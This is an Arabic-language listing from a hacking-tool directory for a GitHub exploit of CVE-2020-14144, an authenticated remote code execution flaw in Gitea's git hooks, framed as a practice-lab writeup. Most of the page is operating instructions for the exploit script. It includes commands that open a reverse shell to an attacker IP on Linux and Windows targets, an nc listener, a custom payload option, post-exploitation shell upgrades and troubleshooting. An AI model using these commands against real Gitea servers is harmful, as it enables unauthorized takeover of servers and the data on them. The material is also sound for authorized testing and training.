Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Gitea-Git-Hooks-RCE-CVE-2020-14144- — تسمح إصدارات Gitea 1.1.0 → 1.12.5 للمستخدمين المصادق عليهم الحاصلين على صلاحية "May create git hooks" بحقن أوامر شل عشوائية في خطافات post-receive. يؤدي دفع commit إلى تشغيل الخطاف وتنفيذ الحمولة على الخادم. | Kitploit
أدوات/GitHubGitHub/mohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubmohnad-al-saif/gitea-git-hooks-rce-cve-2020-14144-

Gitea-Git-Hooks-RCE-CVE-2020-14144-

تسمح إصدارات Gitea 1.1.0 → 1.12.5 للمستخدمين المصادق عليهم الحاصلين على صلاحية "May create git hooks" بحقن أوامر شل عشوائية في خطافات post-receive. يؤدي دفع commit إلى تشغيل الخطاف وتنفيذ الحمولة على الخادم.

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Gitea Git Hooks RCE (CVE-2020-14144)

OffsecProvingGrounds Practice — استغلال جهاز Roquefort ونشر التوثيق (Writeup & POC)

نظرة عامة

العنصرالتفاصيل
الجهازRoquefort (Proving Grounds Practice)
نظام التشغيلLinux
إصدار Gitea1.7.5
CVECVE-2020-14144
ناقل الهجومتنفيذ أوامر عن بُعد (RCE) مُوثَّق عبر Git Hooks
صلاحية المستخدمchloe

إصدارات Gitea 1.1.0 ← 1.12.5 تسمح للمستخدمين المُوثَّقين الحاصلين على صلاحية "May create git hooks" بحقن أوامر شل تعسفية داخل hooks الخاصة بـ post-receive. عند دفع commit يتم تشغيل الـ hook وتنفيذ الحمولة على الخادم.

البدء السريع

تلقائيًا (سكربت بايثون)

root@kitploit:~
# هدف Linux — قشرة عكسية
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os linux

# هدف Windows — قشرة عكسية عبر PowerShell
python3 exploit.py -t http://TARGET:3000 -u test -p password123 -I ATTACKER_IP -P 4444 --os windows

يدويًا

راجع MANUAL.md للحصول على دليل الاستغلال خطوة بخطوة.

هيكل المستودع

root@kitploit:~
.
├── README.md          # هذا الملف
├── MANUAL.md          # دليل الاستغلال اليدوي (Linux + Windows)
└── exploit.py         # سكربت الاستغلال الآلي

المتطلبات

  • Python 3.6+
  • مكتبة requests (pip install requests)
  • git مثبّت على جهاز المهاجم
  • بيانات اعتماد Gitea صالحة مع صلاحيات git hook

الاستخدام

root@kitploit:~
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -I REV_IP -P REV_PORT
                  [--os {linux,windows}] [--repo REPO] [-f PAYLOAD_FILE] [-v]

Roquefort — Gitea Authenticated RCE via Git Hooks (CVE-2020-14144)

required arguments:
  -t, --target       Target Gitea URL (e.g. http://192.168.x.x:3000)
  -u, --username     Gitea username
  -p, --password     Gitea password
  -I, --rev-ip       Attacker listener IP
  -P, --rev-port     Attacker listener port

optional arguments:
  --os               Target OS: linux (default) or windows
  --repo             Repository name to create (default: exploit)
  -f, --payload-file Custom shell script payload file
  -v, --verbose      Verbose output

أمثلة

root@kitploit:~
# 1) تشغيل مستمع
nc -lvnp 4444

# 2) تنفيذ الاستغلال (هدف Linux)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444

# 3) تنفيذ الاستغلال (هدف Windows)
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 --os windows

# 4) ملف حمولة مخصص
python3 exploit.py -t http://192.168.103.67:3000 -u test -p password123 \
  -I 192.168.45.168 -P 4444 -f payload.sh

ترقية القشرة (ما بعد الاستغلال)

بعد التقاط القشرة العكسية:

root@kitploit:~
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg

حل المشكلات

المشكلةالحل
fatal: dubious ownershipقم بالاستنساخ من ~ بدلاً من المجلدات المشتركة، أو شغّل git config --global --add safe.directory '*'
لا يتم استلام اتصالتحقق من عنوان IP للمهاجم، وافحص جدار الحماية، وتأكد من أن الجهازين على نفس الشبكة الفرعية
الـ hook يعمل لكن لا تظهر قشرةاختبر أولاً بحمولة touch /tmp/pwned — إذا ظهر الملف، فالقشرة العكسية محجوبة
رفض الإذن على الـ hooksالمستخدم لا يملك صلاحيات hook — يحتاج صلاحية مسؤول أو "May create git hooks"
تعارض المنفذ 3000Gitea يستخدم المنفذ 3000 — استخدم منفذًا مختلفًا مثل 4444 للمستمع الخاص بك

المراجع

  • CVE-2020-14144 — NVD
  • Gitea Issue #13058
  • p0dalirius Original POC

إخلاء مسؤولية

هذه الأداة مخصصة لاختبار الاختراق المصرح به ولأغراض تعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها بمسؤولية.

تنزيل الأداة